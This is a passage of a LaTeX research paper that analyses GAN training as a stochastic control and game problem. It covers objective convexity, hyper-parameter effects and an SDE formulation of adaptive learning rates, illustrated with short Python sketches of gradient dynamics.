\includegraphics[width=0.45\textwidth]{results_accuracyDiscrim_2.pdf} \includegraphics[width=0.45\textwidth]{results_lossGen_1.pdf}
\caption{Discriminator accuracy in (a), and generator loss in (b).}
\label{Fig:Plot_loss_generator_acc_discrim_CNNGan}
\end{figure}
In response, there have been a number of theoretical studies for GANs training. \citep{Berard2020} proposes a visualization method for the GANs training process through the gradient vector field of loss functions,
\citep{Mescheder2018} demonstrates that regularization improves the convergence performance of GANs, \citep{Conforti2020} and \citep{Domingo-Enrich2020} analyze general minimax games including GANs,
and connect the mixed Nash equilibrium of the game with the invariant measure of Langevin dynamics. In the same spirit, \citep{hsieh2019finding} proposes a sampling algorithm that converges towards mixed Nash equilibria, and then \citep{kamalaruban2020robust} shows how this algorithm escapes saddle points. Recently, \citep{cao2020approximation} establishes
the continuous-time approximation for the discrete-time GANs training by coupled stochastic differential
equations, enabling the convergence analysis of GANs training via stochastic tools.
\paragraph{Our work.} The focus of this paper is to analyze GANs training in the stochastic control and game framework. It starts by revisiting vanilla GANs from the original work of \citep{goodfellow2014generative} and identifies through detailed convexity analysis one of the culprits behind the convergence issue for GANs: the lack of convexity in GANs objective function hence the general well-posedness issue in GANs minimax games. It then reformulates GANs problem as a stochastic game and uses it to study the optimal control of learning rate (and its equivalence to the optimal choice of time scale) and optimal batch size.\\
To facilitate the analysis of this type of minimax games, this paper first establishes the weak form of dynamics programming principle for a general class of stochastic games in the spirit of \citep{bouchard2011weak}; it then focuses on the particular minimax games of GANs training, by analyzing the existence and the uniqueness of viscosity solutions to Issac-Bellman equations. In particular, it obtains an explicit form for the optimal adaptive learning rate and optimal batch size which depend on the convexity of the objective function for the game.
Finally, by experimenting on synthetic data drawn either from the Gaussian distribution or the Student t-distribution and financial data collected from the Quandl Wiki Prices database, it demonstrates that training algorithms incorporating our adaptive control methodology outperform the standard ADAM optimizer, in terms of both convergence and robustness.\\
Note that the dynamic programming principle for stochastic games has been proved in a deterministic setting by \citep{evans1984differential}, and recently extended to the stochastic framework for diffusions under boundedness and regularity conditions \citep{krylov2014dynamic,bayraktar2013weak,sirbu2014martingale,sirbu2014stochastic}. The dynamic programming principle established in this paper requires no continuity assumption and covers a more general class of stochastic differential games beyond diffusions. In addition, upper and lower bounds of the value function are obtained.\\
In terms of GANs training, our analysis provides analytical support for the popular practice of ``clipping'' in GANs \citep{arjovsky2017towards}; and suggests that the convexity and well-posedness issues associated with GANs problems may be resolved by appropriate choices of hyper-parameters. In addition, our study presents a precise relation between explosion in GANs training and improper choices of the learning rate. It also reveals an interesting connection between the optimal learning rate and the standard Newton algorithm.
\paragraph{Notations.} Throughout this paper, the following notations are used:
\begin{itemize}
\item For any vector $x \in \mathbb{R}^d$ with $d \in \mathbb{N}^*$, denote by the operator $\nabla_x$ the gradient with respect to the coordinates of $x$. When there is no subscript $x$, the operator $\nabla$ refers to the standard gradient operator.
\item For any $d \in \mathbb{N}^*$, the set $\mathcal{M}_{\mathbb{R}}(d)$ is the space of $d\times d$ matrices with real coefficients.
\item For any vector $m \in \mathbb{R}^d$ and symmetric positive-definite matrix $ A \in \mathcal{M}_{\mathbb{R}}(d)$ with $d \in \mathbb{N}^*$, denote by $ N(m,A)$ the Gaussian distribution with mean $m$ and covariance matrix $A$.
\item $\mathbb{E}_X$ emphasizes on the dependence of expectation with respect to the distribution of $X$.
\end{itemize}
\section{GANs: Well-posedness and Convexity}
\label{sec:GAN_wellpos}
\paragraph{GANs as generative models.} GANs fall into the category of generative models. The procedure of generative modeling is to approximate an {\it unknown true} distribution ${\mathbb P}_X$ of a random variable $X$ from a sample space $\cal{X}$ by constructing a class of suitable parametrized probability distributions ${\mathbb P}_\theta$. That is, given a latent space $\cal{Z}$, define a latent variable $Z\in\cal{Z}$ with a fixed probability distribution
and a family of functions $G_\theta: \cal{Z} \to \cal{X}$ parametrized by $\theta$. Then, $\mathbb{P}_\theta$ can be seen as the probability distribution of $G_\theta(Z)$.\\
To approximate ${\mathbb P}_X$, GANs use two competing neural networks: a generator network for the function $G_\theta$, and a discriminator network $D_w$ parametrized by $w$. The discriminator $D_w$ assigns a score between $0$ and $1$ to each sample. A score closer to $1$ indicates that the sample is more likely to be from the true distribution.
GANs are trained by optimizing $G_\theta$ and $D_w$ iteratively until $D_w$ can no longer distinguish between true and generated samples and assigns a score close to $0.5$.
\paragraph{Equilibrium of GANs as minimax games.} Under a fixed network architecture, the parametrized GANs optimization problem can be viewed as the following minimax game:
\begin{align}
\min_{\theta \in \mathbb{R}^{N}} \max_{w \in \mathbb{R}^{M}} g(w,\theta),
\label{Eq:min_pbm_gan}
\end{align}
with $g:\mathbb{R}^M \times \mathbb{R}^N \rightarrow \mathbb{R}$ the objective function. In vanilla GANs,
\begin{equation}
g(w,\theta) = \mathbb{E}_X\big[\log(D_w(X))\big] + \mathbb{E}_Z\big[\log\big(1 - D_w(G_\theta(Z))\big)\big],
\label{Eq:vanilla_gan}
\end{equation}
where $D_w: \mathbb{R}^M \rightarrow \mathbb{R}$ is the discriminator network, $G_\theta: \mathbb{R}^N \rightarrow \mathbb{R}$ is the generator network, $X$ represents the unknown data distribution, and $Z$ is the latent variable. \\
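In practice, the two expectations in \eqref{Eq:vanilla_gan} are approximated by Monte-Carlo averages over minibatches of real samples $X$ and latent samples $Z$. The following stdlib sketch illustrates this with a toy one-dimensional parametrization (the sigmoid-linear discriminator, the linear generator, and the standard normal choices for $X$ and $Z$ below are our illustrative assumptions):

```python
import math
import random

def estimate_g(d_params, g_params, n_samples=10_000, seed=0):
    """Monte-Carlo estimate of g(w, theta) for vanilla GANs with
    D_w(x) = sigmoid(w1 + w2 * x) and G_theta(z) = theta1 + theta2 * z,
    and X ~ N(0, 1), Z ~ N(0, 1) (toy choices for illustration)."""
    rng = random.Random(seed)
    w1, w2 = d_params
    t1, t2 = g_params
    sigmoid = lambda v: 1.0 / (1.0 + math.exp(-v))
    total = 0.0
    for _ in range(n_samples):
        x = rng.gauss(0.0, 1.0)                       # real sample
        z = rng.gauss(0.0, 1.0)                       # latent sample
        total += math.log(sigmoid(w1 + w2 * x))       # E[log D(X)] term
        total += math.log(1.0 - sigmoid(w1 + w2 * (t1 + t2 * z)))  # E[log(1 - D(G(Z)))]
    return total / n_samples
```

With $w = (0,0)$ the discriminator is identically $1/2$, so the estimate equals $2\log(1/2) = -\log 4$ regardless of the sampled batch, which is the well-known value of the objective at the GANs optimum.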
From a game theory viewpoint, the objective in \eqref{Eq:min_pbm_gan}, when attained, is in fact the upper value of the two-player zero-sum game of GANs. If there exists a locally optimal pair of parameters $(\theta^*,w^*)$ for \eqref{Eq:min_pbm_gan}, then $(\theta^*,w^*)$ is a Nash equilibrium, i.e., no player can do better by unilaterally deviating from her strategy. \\
To guarantee the existence of a Nash equilibrium, convexity or concavity conditions are required at least locally. From an optimization perspective, these convexity/concavity conditions also ensure the absence of a duality gap, as suggested by Sion's generalized minimax theorem in \citep{sion1958general} and \citep{von1959theory}.
\subsection{GANs Training and Convexity}
\manuallabel{sec:GANsTrainConv}{2.2}
GANs are trained by stochastic gradient algorithms (SGA). In GANs training, if $g$ is convex (resp. concave) in $\theta$ (resp. $\omega$), then it is possible to decrease (resp. increase) the objective function $g$ by moving in the opposite (resp. same) direction of the gradient. \\
It is well known that SGA may not converge without suitable convexity properties on $g$, even when the Nash equilibrium is unique for a minimax game. For instance, $g(x,y)=xy$ clearly admits the point $(0,0)$ as a unique Nash equilibrium. However, as illustrated in Figure \ref{Fig:spiral}, SGA fails to converge since $g$ is neither strictly concave nor strictly convex in $x$ or $y$. \\
\begin{figure}[h!]
\center
\includegraphics[width=0.45\textwidth]{LSGDFxy_polished_crop.pdf}
\caption{Plot of the parameters values when using SGA to solve the minimax problem $\min_{y \in \mathbb{R}} \max_{x \in \mathbb{R}} x y$. The label ``Start" (resp. ``End") indicates the initial (resp. final) value of the parameters.}
\label{Fig:spiral}
\end{figure}
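The divergence in Figure \ref{Fig:spiral} is easy to reproduce: one simultaneous gradient step on $g(x,y) = xy$ maps $(x,y)$ to $(x + \eta y,\, y - \eta x)$, which rotates the iterate around the equilibrium $(0,0)$ while multiplying its norm by $\sqrt{1+\eta^2} > 1$. A minimal sketch:

```python
import math

def simultaneous_gda(x, y, lr, n_steps):
    """Simultaneous gradient descent-ascent on g(x, y) = x * y:
    ascent in x (max player), descent in y (min player)."""
    trajectory = [(x, y)]
    for _ in range(n_steps):
        grad_x, grad_y = y, x                      # partial derivatives of x * y
        x, y = x + lr * grad_x, y - lr * grad_y    # simultaneous update
        trajectory.append((x, y))
    return trajectory

traj = simultaneous_gda(1.0, 1.0, lr=0.1, n_steps=100)
```

After $n$ steps the distance to the equilibrium has grown by the factor $(1+\eta^2)^{n/2}$, so the iterates spiral outward exactly as in the figure, independently of how small the learning rate is chosen.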
Moreover, convexity properties are easy to violate with the composition of multiple layers in a neural network even for a simple GANs model, as illustrated in the following example.
\paragraph{Counterexample.}
Consider the vanilla GANs with $g$ as in \eqref{Eq:vanilla_gan}, and take two normal distributions for $X$ and $Z$ such that $X \sim N(m,\sigma^2)$ and $Z \sim N(0,1)$,
with $(m,\sigma)\in \mathbb{R} \times \mathbb{R}_+$. \\
Now take the following parametrization of the discriminator and the generator networks:
\begin{equation}
\label{Eq:simple_model}
\left\{
\begin{array}{ll}
D_w(x) & = D_{(w_1,w_2,w_3)}(x) = \cfrac{1}{1+e^{-(w_3/2\cdot x^2 + w_2 x + w_1 )}},\\
G_\theta (z) & = G_{(\theta_1,\theta_2)}(z) = \theta_2 z + \theta_1,
\end{array}
\right.
\end{equation}
where $w = (w_1,w_2,w_3) \in \mathbb{R}^3$, and $\theta = ( \theta_1, \theta_2) \in \mathbb{R} \times \mathbb{R}_+$.
Note that these parametrizations of the discriminator and the generator networks are standard, since the generator is a simple linear layer and the discriminator can be seen as the composition of the sigmoid activation function with a linear layer in the variable $(x,x^2)$.\\
To find the optimal choice for the parameters $w$ and $\theta$, denote by $f_X$ and $f_G$ respectively the density functions of $X$ and $G_\theta(Z)$. Then, the density $f_{G^*}$ of the optimal generator is given by $f_{G^*} = f_X$, meaning $\theta^* = (m,\sigma)$. Moreover, Proposition 1 in \citep{goodfellow2014generative} shows that the optimal value for the discriminator is
\begin{align*}
D_{w^*}(x) = \cfrac{f_X(x)}{f_X(x) + f_{G^*}(x)} = \cfrac{1}{1 + (f_{G^*}/f_X)(x)} = \cfrac{1}{2},
\end{align*}
for any $x\in \mathbb{R}$, which gives $w^* = (0,0,0)$. \\
We now demonstrate that the function $g$ may not satisfy the convexity/concavity requirement.
\begin{itemize}
\item To see this, let us first study the concavity of the function $g_{\theta^0}:w \rightarrow g(w,\theta^0)$ with $\theta^0$ fixed. We will show that $g_{\theta^0}$ is concave with respect to $w$.
To this end, write $D_w$ as the composition of the two following functions $D^1$ and $L$:
\begin{equation*}
\hspace{-0.2cm}D^1(x) = 1/(1+e^{-x}), \quad L(w;x) = w_3/2\cdot x^2 + w_2 x + w_1
\end{equation*}
for any $x \in \mathbb{R}$, and $w =(w_1,w_2,w_3) \in \mathbb{R}^3$. Note that a straightforward computation of the second derivatives shows that the functions
\begin{equation*}
g^1: x \rightarrow \log(D^1(x)), \quad g^2: x \rightarrow \log(1 - D^1(x)),
\end{equation*}
with $x \in \mathbb{R}$ are both concave. Thus, by linearity and composition, the function $g_{\theta^0}:w \rightarrow \mathbb{E}_X[g^1(L(w;X))] + \mathbb{E}_Z[ g^2(L(w;G_{\theta^0}(Z)))]$ remains concave.
\item Next, we investigate the convexity of the function $g_{w^0}:\theta \rightarrow g(w^0,\theta)$ with $w^0$ fixed. We will show that $g_{w^0}$ is not necessarily convex with respect to $\theta$. \\
To this end, first note that the term $\mathbb{E}_X[\log(D_{w^0}(X))]$ does not depend on the parameter $\theta$. Therefore, one can simply focus on the function $g^3:\theta \rightarrow \mathbb{E}_{Z}[\log(1 - D_{w^0}(G_{\theta}(Z)))]$, which is not necessarily convex with respect to $\theta$.
To see this, let us take $\theta_2 = 0$ for simplicity\footnote{This enables us to get rid of the expectation with respect to $Z$.} and study the function
\begin{align*}
g^3|_{\theta_2=0}: \theta_1 & \rightarrow \log(1 - D_{w^0}(G_{(\theta_1,0)}(z))) \\
& = \log\big(1 - 1/(1 + e^{-(w^0_3/2\cdot \theta_1^2 + w^0_2 \theta_1 + w^0_1)})\big),
\end{align*}
with $\theta_1 \in \mathbb{R}$. On one hand, the convexity of $g^3|_{\theta_2=0} $ depends on the choice of the parameter $w^0_3$, as demonstrated in Figure \ref{Fig:Plot_phi31}. On the other hand, simple computation of the second derivative gives
$$
(g^3|_{\theta_2=0})^{(2)}(\theta_1) =
-\cfrac{e^{h(\theta_1) + w^0_1} \big(w^0_3 \big(e^{h(\theta_1) + w^0_1} + 2 h(\theta_1) + 1\big) + (w^0_2)^2\big) }{\big(e^{h(\theta_1) + w^0_1} + 1\big)^2}, $$
with $\theta_1 \in \mathbb{R}$, and $h(\theta_1) = \theta_1 ( w^0_3/2 \times \theta_1 + w^0_2) $. The sign of this function depends on the choice of the parameter $w^0$. Thus, $g_{w^0}$ is not necessarily convex with respect to $\theta$.
\end{itemize}
\begin{figure}[h!]
\center
(a) \hspace{3.5cm} (b)\\
\includegraphics[width=0.23\textwidth]{w3_polished_1.pdf}
\includegraphics[width=0.2325\textwidth]{w3_polished_2.pdf}
\caption{Plot of $g^3|_{\theta_2=0}$ with $(w_1,w_2,w_3) = (1,1,2)$ in (a) and $(w_1,w_2,w_3) = (1,1,-2)$ in (b).}
\label{Fig:Plot_phi31}
\end{figure}
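The sign change visible in Figure \ref{Fig:Plot_phi31} can also be verified numerically. The sketch below (illustrative only; the sample points are arbitrary) estimates the second derivative of $g^3|_{\theta_2=0}$ by central finite differences for the two parameter choices used in the figure.

```python
import math

def sigmoid(t):
    return 1.0 / (1.0 + math.exp(-t))

def g3(theta1, w):
    # g^3 restricted to theta_2 = 0, i.e. log(1 - D_w(G_{(theta_1, 0)}(z)))
    w1, w2, w3 = w
    return math.log(1.0 - sigmoid(w3 / 2.0 * theta1 ** 2 + w2 * theta1 + w1))

def second_diff(f, t, h=1e-4):
    # Central finite-difference estimate of the second derivative at t.
    return (f(t + h) - 2.0 * f(t) + f(t - h)) / h ** 2

samples = (-2.0, 0.0, 2.0)
curv_a = [second_diff(lambda t: g3(t, (1, 1, 2)), t) for t in samples]
curv_b = [second_diff(lambda t: g3(t, (1, 1, -2)), t) for t in samples]
print(curv_a)  # all negative: for w3 = 2 the restriction is concave here
print(curv_b)  # mixed signs: for w3 = -2 it is neither convex nor concave
```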
This analysis pinpoints analytically one of the culprits behind the convergence issues of GANs: the lack of convexity of the objective function, and hence the ill-posedness of GANs as minimax games.
\subsection{GANs Training and Parameters Tuning}
\manuallabel{sec:GANTrainParamTun}{2.3}
In addition to the convexity and well-posedness issue of GANs as minimax games, appropriate choices and specifications for parameters' tuning affect GANs training as well.
\paragraph{Hyper-parameters in GANs training.} There are three key hyper-parameters in stochastic gradient algorithms for GANs training: the learning rate, the time scale, and the batch size.
\begin{itemize}
\item The learning rate determines how far to move along the gradient direction. A higher learning rate accelerates convergence but increases the risk of explosion, while a lower learning rate yields slower convergence.
\item The time scale parameters monitor the numbers of updates of the variables $w$ and $\theta$. In the context of GANs training, there are generally two different time scales: a finer time scale for the discriminator and a coarser one for the generator, or conversely. Note that more updates mean faster convergence, but are also computationally more costly.
\item The batch size refers to the number of training samples used in the estimate of the gradient.
The more training samples used in the estimate, the more accurate this estimate is, yet at a higher computational cost. A smaller batch size, while providing a cruder estimate, offers a regularizing effect and lowers the chance of overfitting.
\end{itemize}
\paragraph{Example of improper learning rate.}
A simple example below demonstrates the importance of an appropriate choice of learning rate for the convergence of SGA. Consider the $\mathbb{R}$-valued function $$f(x) = (a /2) \,\, x^2 + b \, x, \qquad \forall x \in \mathbb{R},$$ where $(a,b) \in \mathbb{R}_{+} \times \mathbb{R}$. Finding the minimizer $x^* = -(b/a)$ of $f$ via the gradient algorithm consists of updating an initial guess $x_0 \in \mathbb{R}$ as follows:
\begin{align}
x_{n+1} = x_{n} - \eta (a x_{n} + b ),\qquad \forall n \geq 0, \label{Eq:GradEgExplo}
\end{align}
with $\eta$ the learning rate. Let us study the behavior of the error $e_n = |x_n - x^*|^2$. By \eqref{Eq:GradEgExplo} and $ a x^* + b = 0$,
\begin{align*}
e_{n+1} = |x_{n+1} - x^*|^2 & = |x_n - x^*|^2 + 2 ( x_{n+1} - x_n )( x_n - x^* ) + |x_{n+1} - x_n|^2 \\
& = \big(1 - \eta a(2 - \eta a ) \big)|x_{n} - x^*|^2. \numberthis \label{Eq:GradEgExplo2}
\end{align*}
Thus, when $\eta > 2/a$, the factor $\eta a(2 - \eta a ) < 0 $ which means $ r = \big(1 - \eta a(2 - \eta a ) \big) > 1$. In such a case, Equation \eqref{Eq:GradEgExplo2} becomes
$$
e_{n+1} = r \, e_n,
$$
ensuring that $e_n \rightarrow + \infty$ as $n$ goes to infinity whenever $e_0 > 0$, so the gradient algorithm fails to converge. This example highlights the importance of the learning rate parameter. Such an issue of improper learning rates for GANs training will be revisited in a more general setting (see Section \ref{sec:OptLearningRate}). \\
Note that there are earlier works on optimal learning rate policies to improve the performance of gradient-like algorithms (see for instance \citep{moulines2011non}, \citep{gadat2017optimal}, and \citep{mounjid2019improving}).
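The dichotomy $\eta \lessgtr 2/a$ is immediate to check numerically. The following sketch (illustrative only; all constants are arbitrary choices) runs the update rule \eqref{Eq:GradEgExplo} with one learning rate on each side of the threshold.

```python
def gradient_descent(a, b, x0, eta, n_steps):
    # Iterate x_{n+1} = x_n - eta * (a * x_n + b) for f(x) = a/2 * x**2 + b * x,
    # whose minimizer is x* = -b / a. The error is scaled by the factor
    # |1 - eta * a| per step, so it explodes as soon as eta > 2 / a.
    x = x0
    for _ in range(n_steps):
        x = x - eta * (a * x + b)
    return x

a, b = 2.0, 1.0  # threshold 2 / a = 1, minimizer x* = -0.5
x_good = gradient_descent(a, b, x0=1.0, eta=0.4, n_steps=50)  # eta < 2/a
x_bad = gradient_descent(a, b, x0=1.0, eta=1.5, n_steps=50)   # eta > 2/a
print(x_good, x_bad)  # x_good is essentially -0.5; x_bad has exploded
```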
\paragraph{Time scale for GANs training.} Equation \eqref{Eq:update_rule_grad} corresponds to a specific implementation where the parameters $w$ and $\theta$ are updated simultaneously. However, it is also possible to consider an asynchronous update of the following form (see for example Algorithm 1 in \citep{arjovsky2017wasserstein}):
\begin{algorithm}[H]
\caption{Asynchronous gradient algorithm}
\begin{algorithmic}[1]
\For{$i = 1 \ldots n^{\theta}_{\max}$}
\For{$j = 1 \ldots n^{w}_{\max}$}
\State $w \leftarrow w + \eta^{w} g_{w}(w,\theta) $
\EndFor
\State $\theta \leftarrow \theta - \eta^{\theta} g_{\theta}(w,\theta)$
\EndFor
\end{algorithmic}
\label{Alg:async_update_rule_sde}
\end{algorithm}
where $n^{w}_{\max}$ and $n^{\theta}_{\max}$ are respectively the maximum numbers of iterations of the inner and the outer loop. In such a context, one naturally deals with two time scales: a finer time scale for the discriminator and a coarser one for the generator. The time scale parameters $n^{w}_{\max}$ and $n^{\theta}_{\max}$ monitor the number of updates of the variables $w$ and $\theta$. As mentioned earlier, more updates mean faster convergence, but at the cost of more gradient computations. It is therefore necessary to select these parameters carefully in order to perform updates only when needed.
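As a toy illustration of Algorithm \ref{Alg:async_update_rule_sde} (not a GANs model; the quadratic objective and all constants below are arbitrary choices), consider the saddle problem $\min_\theta \max_w g(w,\theta) = 2w\theta - w^2$, whose unique equilibrium is $(0,0)$: the inner loop drives the maximizing variable $w$ close to $\theta$ before each coarse update of $\theta$.

```python
def asynchronous_sga(w, theta, eta_w, eta_theta, n_w_max, n_theta_max):
    # Two-time-scale loop for min_theta max_w g(w, theta) = 2*w*theta - w**2:
    # g_w = 2*theta - 2*w (ascent in w), g_theta = 2*w (descent in theta).
    for _ in range(n_theta_max):      # coarse time scale: generator-like update
        for _ in range(n_w_max):      # fine time scale: discriminator-like update
            w = w + eta_w * (2.0 * theta - 2.0 * w)
        theta = theta - eta_theta * (2.0 * w)
    return w, theta

w, theta = asynchronous_sga(0.0, 1.0, eta_w=0.3, eta_theta=0.2,
                            n_w_max=20, n_theta_max=25)
print(w, theta)  # both close to the unique equilibrium (0, 0)
```

With $n^{w}_{\max}=20$ inner steps, the inner contraction factor $0.4^{20}$ makes $w$ essentially optimal for the current $\theta$, after which each outer step shrinks $\theta$ by the factor $0.6$.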
\paragraph{Batch size for GANs training.}
To better understand the batch size impact, we consider here the vanilla objective function $g$, i.e.,
\begin{equation*}
g(w,\theta) = \mathbb{E}_X\big[\log(D_w(X))\big] + \mathbb{E}_Z\big[\log\big(1 - D_w(G_\theta(Z))\big)\big].
\end{equation*}
In general, the function $g$ is approximated by the empirical mean
\begin{equation}
g^{NM}(w,\theta) = \cfrac{\sum_{i = 1}^N \sum_{j = 1}^M g^{i,j}(w,\theta)}{N \cdot M},
\label{Eq:empMeanEstimate}
\end{equation}
with
$$
g^{i,j}(w,\theta) = \log( D_{w}(x_i)) + \log\big(1 - D_{w}\big(G_{\theta}(z_j)\big)\big),
$$
where $(x_i)_{i \leq N}$ are i.i.d. samples from $\mathbb{P}_X$ the distribution of $X$, $(z_j)_{j \leq M}$ are i.i.d. samples from $\mathbb{P}_Z$ the distribution of $Z$, and $N$ (resp. $M$) is the number of $\mathbb{P}_X$ (resp. $\mathbb{P}_Z$) samples. The quantity $N\cdot M$ here represents the batch size. It is clear from Equation \eqref{Eq:empMeanEstimate} that enlarging the batch size offers a better estimate of $g(w,\theta)$ since it reduces the variance. However, such an improvement requires more computational power. Sometimes, it is better to spend that power on performing more gradient updates rather than on reducing the variance.
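The variance reduction behind Equation \eqref{Eq:empMeanEstimate} is the usual $1/\sqrt{\text{batch size}}$ effect for empirical means of i.i.d. terms. The sketch below (illustrative only; a standard Gaussian draw stands in for the per-sample terms $g^{i,j}$) compares the spread of the estimator across two batch sizes.

```python
import random

random.seed(0)

def batch_estimate(batch_size):
    # Empirical mean over `batch_size` i.i.d. draws, standing in for g^{NM}.
    return sum(random.gauss(0.0, 1.0) for _ in range(batch_size)) / batch_size

def empirical_std(batch_size, n_trials=2000):
    # Spread of the batch estimator across many independent batches.
    estimates = [batch_estimate(batch_size) for _ in range(n_trials)]
    mean = sum(estimates) / n_trials
    return (sum((e - mean) ** 2 for e in estimates) / n_trials) ** 0.5

std_small, std_large = empirical_std(10), empirical_std(100)
print(std_small, std_large)  # roughly 1/sqrt(10) vs 1/sqrt(100)
```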
\section{Control and Game Formulation of GANs Training}
Clearly, hyper-parameters introduced in Section \ref{sec:GANTrainParamTun} are not independent for GANs training, which often involves choices between adjusting learning rates and changing sample sizes. In this section, we show how hyper-parameters' tuning can be formulated and analyzed as stochastic control problems, and how the popular practice of ``clipping'' in GANs training can be understood analytically in this framework.
\subsection{Stochastic Control of Learning Rate}
\manuallabel{sec:LRAnalysis}{3.1}
In this part, we present an optimal selection methodology for the learning rate. To start, let us recall the continuous-time stochastic differential equation used to represent GANs training.
\paragraph{SDE approximation of GANs training.} In GANs training, gradient algorithms for the optimal parameters $\theta^*$ and $w^*$ start with an initial guess $(w_0,\theta_0)$ and apply at time step $t$ the following (simultaneous) update rule:
\begin{equation}
\left\{
\begin{array}{ll}
w_{t+1} & = w_{t} + \eta g_{w}(w_t,\theta_t), \\
\theta_{t+1} & = \theta_t - \eta g_{\theta}(w_t,\theta_t),
\end{array}
\right.
\label{Eq:update_rule_grad}
\end{equation}
with $g_{w} = \nabla_{w} g$, $g_{\theta} = \nabla_{\theta} g $, and $ \eta \in \mathbb{R}_+$ the learning rate. \\
The continuous-time approximation of GANs training via functional central limit theorem \citep{cao2020approximation} replaces the update rule in \eqref{Eq:update_rule_grad} with coupled
stochastic differential equations (SDEs)
\begin{equation}
\left\{
\begin{array}{ll}
dw(t) & = g_{w}(q(t)) dt + \sqrt{\eta} \sigma_w(q(t)) dW^1(t), \\
d\theta(t) & = - g_{\theta}(q(t)) dt + \sqrt{\eta} \sigma_\theta(q(t)) dW^2(t),
\end{array}
\right.
\label{Eq:sde}
\end{equation}
where $q(t) = (w(t),\theta(t))$, the functions $\sigma_w: \mathbb{R}^{M} \times \mathbb{R}^{N} \rightarrow \mathcal{M}_{\mathbb{R}}(M)$ and $\sigma_\theta: \mathbb{R}^{M} \times \mathbb{R}^{N} \rightarrow \mathcal{M}_{\mathbb{R}}(N)$ are approximated by the covariances of $g_{w}$ and $g_{\theta}$, and the Brownian motions $W^1$ and $W^2$ are independent. Note that in this SDE approximation, the learning rates for the generator and the discriminator $(\eta,\eta)$ are fixed constants. Based on this approximation, optimal choices of learning rate can be formulated as a stochastic control problem.
\paragraph{Adaptive learning rate.} The idea goes as follows. Consider the following decomposition for the learning rate $\eta(t)$ at time $t$:
\begin{align*}
\eta(t) = \big( \eta^w(t), \eta^{\theta}(t)\big) & = \big( u^w(t) \times \bar{\eta}^w(t), u^\theta(t) \times \bar{\eta}^{\theta}(t)\big) = u(t) \bullet \bar{\eta}(t), \quad \forall t \geq 0,
\numberthis \label{eq:learning_rate}
\end{align*}
where the first component $\bar{\eta}(t) = (\bar{\eta}^w(t), \bar{\eta}^{\theta}(t))\in [\bar{\eta}^{\min},1]^2$ is a predefined base learning rate fixed by the controller using her favorite learning rate selection method, and the second component $u(t) = (u^w(t), u^{\theta}(t))$ is a $[u^{\min},u^{\max}]^2$-valued process representing an adjustment around $\bar{\eta}(t)$. The symbol $\bullet $ here is the component-wise product between vectors. Furthermore, the positive constants $\bar{\eta}^{\min}$, $u^{\min}$, and $u^{\max}$ are ``clipping'' parameters introduced to handle the convexity issue discussed earlier for GANs training, to establish ellipticity conditions needed for the regularity of the value function, and to avoid explosion. This explosion aspect will be clarified shortly. With the incorporation of the adaptive learning rate \eqref{eq:learning_rate}, the corresponding SDE for GANs training becomes
\begin{equation}
\left\{
\begin{array}{l}
dw(t) = u^{w}(t) g_{w}(q(t)) dt + \big(u^{w}\sqrt{\bar{\eta}^{w}}\big)(t) \sigma_w(q(t)) dW^1(t), \\
\\
d\theta(t) = - u^{\theta}(t) g_{\theta}(q(t)) dt + \big(u^{\theta}\sqrt{\bar{\eta}^{\theta}}\big)(t) \sigma_\theta(q(t)) dW^2(t),
\end{array}
\right. \label{Eq:sde2}
\end{equation}
with $q(t) = (w(t),\theta(t)) $ for any $t\geq 0$.
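The controlled dynamics \eqref{Eq:sde2} can be integrated by a standard Euler--Maruyama scheme. The sketch below is illustrative only: a toy saddle objective $g(w,\theta) = w\theta - w^2/2$, constant scalar controls, and scalar noise replace the GANs quantities, and all constants are arbitrary choices.

```python
import math
import random

random.seed(1)

def euler_maruyama(w, theta, u_w, u_theta, base_eta, sigma, dt, n_steps):
    # Euler-Maruyama steps for the controlled SDEs with constant controls:
    #   dw     =  u_w * g_w dt     + u_w * sqrt(base_eta) * sigma dW^1,
    #   dtheta = -u_theta * g_theta dt + u_theta * sqrt(base_eta) * sigma dW^2,
    # with the toy saddle g(w, theta) = w*theta - w**2/2, so that
    # g_w = theta - w and g_theta = w, and saddle point (0, 0).
    for _ in range(n_steps):
        dW1 = random.gauss(0.0, math.sqrt(dt))
        dW2 = random.gauss(0.0, math.sqrt(dt))
        w, theta = (w + u_w * (theta - w) * dt
                      + u_w * math.sqrt(base_eta) * sigma * dW1,
                    theta - u_theta * w * dt
                          + u_theta * math.sqrt(base_eta) * sigma * dW2)
    return w, theta

w, theta = euler_maruyama(1.0, 1.0, u_w=1.0, u_theta=1.0,
                          base_eta=0.01, sigma=0.1, dt=0.01, n_steps=5000)
print(w, theta)  # the noisy dynamics hover near the saddle point (0, 0)
```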
\paragraph{Optimal control of adaptive learning rate.} Let $T< \infty$ be a finite time horizon, and define the objective function $J$ as
\begin{equation*}
J(T,t,q;u) = \mathbb{E}\big[g\big(q(T)\big)\big|q(t) = q],
\end{equation*}
where $q = (w,\theta) \in \mathbb{R}^{M} \times \mathbb{R}^{N}$ is the value of the process $q(t)$ at $t \in [0,T]$. Note that the function $J$ here is similar to the mapping $g$ used in vanilla GANs (see Equation \eqref{Eq:min_pbm_gan}). The main difference consists of replacing the constant parameters $(w,\theta)$ in \eqref{Eq:min_pbm_gan} by their value $q(T)$ at the end of the training. Moreover, since $q(T)$ is a random variable, an expectation is taken to evaluate the average value of $g\big(q(T)\big)$. \\
Then, the control problem for the adaptive learning rate is formulated as
\begin{equation}
v(t,q) = \min_{u^\theta \in \mathcal{U}^{\theta}} \max_{u^{w} \in \mathcal{U}^{w}} J(T,t,q;u),
\label{Eq:ValFunctDef}
\end{equation}
for any $(t,q) \in [0,T] \times \mathbb{R}^M \times \mathbb{R}^N$, with $\mathcal{U}^{w}$ and $\mathcal{U}^{\theta}$ the set of appropriate admissible controls for $u^w$ and $u^\theta$. For a fixed $u^\theta \in \mathcal{U}^{\theta}$, $\mathcal{U}^{w}$ is defined as
\begin{align*}
\mathcal{U}^{w} = \big\{ u :\;& u \text{ c\`{a}dl\`{a}g in } [u^{\min},u^{\max}] \text{ adapted to } \mathbb{F}^{(W^1,W^2)},\\
& \mathbb{E}[g\big( q(T) \big) \,|\,q(0)\,] < \infty \big\},
\end{align*}
where $u^{\max} \geq u^{\min} > 0$ are the upper bounds introduced earlier. Then, we write $\mathcal{U}^{\theta}$ as follows:
\begin{align*}
\mathcal{U}^{\theta} = \big\{ u :\;& u \text{ c\`{a}dl\`{a}g in } [u^{\min},u^{\max}] \text{ adapted to } \mathbb{F}^{(W^1,W^2)},\\
& \sup_{u \in \mathcal{U}^{w}} \mathbb{E}[g\big( q(T) \big) \,|\,q(0)\,] < \infty
\big\}.
\end{align*}
\subsection{Stochastic Control of Time Scales}
\manuallabel{sec:TimeScaleSelec}{3.2}
